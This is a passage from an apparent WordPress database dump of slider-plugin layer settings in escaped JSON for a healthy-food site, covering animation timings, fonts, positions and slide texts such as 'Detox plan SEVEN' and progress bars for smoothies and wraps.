9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\"},\"4\":{\"text\":\"SWEET & HEALTY FOOD\",\"alias\":\"[qodef_section_title ...\",\"uid\":4,\"size\":{\"width\":{\"d\":{\"v\":\"729px\",\"e\":true},\"n\":{\"v\":\"188px\",\"e\":true},\"t\":{\"v\":\"200px\",\"e\":true},\"m\":{\"v\":\"199px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"25px\",\"e\":true}},\"originalWidth\":\"729px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-358px\",\"e\":true},\"n\":{\"v\":\"-370px\",\"e\":true},\"t\":{\"v\":\"-133px\",\"e\":true},\"m\":{\"v\":\"-54px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-100px\",\"e\":true},\"n\":{\"v\":\"-148px\",\"e\":true},\"t\":{\"v\":\"-178px\",\"e\":true},\"m\":{\"v\":\"-42px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"2px\",\"e\":true},\"t\":{\"v\":\"2px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"7\":{\"text\":\"[vc_column][qodef_progress_bar title_tag=\\\"\\\" percent=\\\"38\\\" title=\\\"Aloe Shots\\\"][qodef_progress_bar title_tag=\\\"\\\" percent=\\\"53\\\" title=\\\"Smoothies\\\"][qodef_progress_bar title_tag=\\\"\\\" percent=\\\"67\\\" title=\\\"Veggie Wraps\\\"]\",\"alias\":\"Progres bar\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"v\":\"624px\",\"e\":true},\"n\":{\"v\":\"505px\",\"e\":true},\"t\":{\"v\":\"466px\",\"e\":true},\"m\":{\"v\":\"310px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"121px\",\"e\":true},\"t\":{\"v\":\"138px\",\"e\":true},\"m\":{\"v\":\"200px\",\"e\":true}},\"originalWidth\":\"624px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-408px\",\"e\":true},\"n\":{\"v\":\"-209px\",\"e\":true},\"t\":{\"v\":\"151px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"175px\",\"e\":true},\"n\":{\"v\":\"71px\",\"e\":true},\"t\":{\"v\":\"447px\",\"e\":true},\"m\":{\"v\":\"120px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"9\":{\"text\":\"Detox plan SEVEN\",\"alias\":\"Detox plan SEVEN\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"514px\",\"e\":true},\"n\":{\"v\":\"317px\",\"e\":true},\"t\":{\"v\":\"317px\",\"e\":true},\"m\":{\"v\":\"324px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"23px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"89px\",\"e\":true}},\"scaleProportional\":true,\"originalWidth\":\"514px\",\"originalHeight\":\"23px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-468px\",\"e\":true},\"n\":{\"v\":\"-306px\",\"e\":true},\"t\":{\"v\":\"-76px\",\"e\":true},\"m\":{\"v\":\"7px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-61px\",\"e\":true},\"n\":{\"v\":\"-109px\",\"e\":true},\"t\":{\"v\":\"-141px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"36px\",\"e\":true},\"n\":{\"v\":\"36px\",\"e\":true},\"t\":{\"v\":\"36px\",\"e\":true},\"m\":{\"v\":\"36px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(22,8,5,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide5-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"Power3.easeOut\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}}}','{\"22\":{\"text\":\"Image 8\",\"alias\":\"Image 8\",\"uid\":22,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/home-10.png\",\"imageId\":3778},\"size\":{\"width\":{\"d\":{\"v\":\"481px\",\"e\":true},\"n\":{\"v\":\"461px\",\"e\":true},\"t\":{\"v\":\"484px\",\"e\":true},\"m\":{\"v\":\"484px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"298px\",\"e\":true},\"n\":{\"v\":\"285px\",\"e\":true},\"t\":{\"v\":\"299px\",\"e\":true},\"m\":{\"v\":\"299px\",\"e\":true}},\"originalWidth\":665,\"originalHeight\":412,\"aspectRatio\":{\"d\":{\"v\":1.61407766990291268172086347476579248905181884765625},\"n\":{\"v\":1.61407766990291268172086347476579248905181884765625},\"t\":{\"v\":1.61407766990291268172086347476579248905181884765625},\"m\":{\"v\":1.61407766990291268172086347476579248905181884765625}}},\"position\":{\"x\":{\"d\":{\"v\":\"546px\",\"e\":true},\"n\":{\"v\":\"301px\",\"e\":true},\"t\":{\"v\":\"6px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"249px\",\"e\":true},\"n\":{\"v\":\"144px\",\"e\":true},\"t\":{\"v\":\"239px\",\"e\":true},\"m\":{\"v\":\"133px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\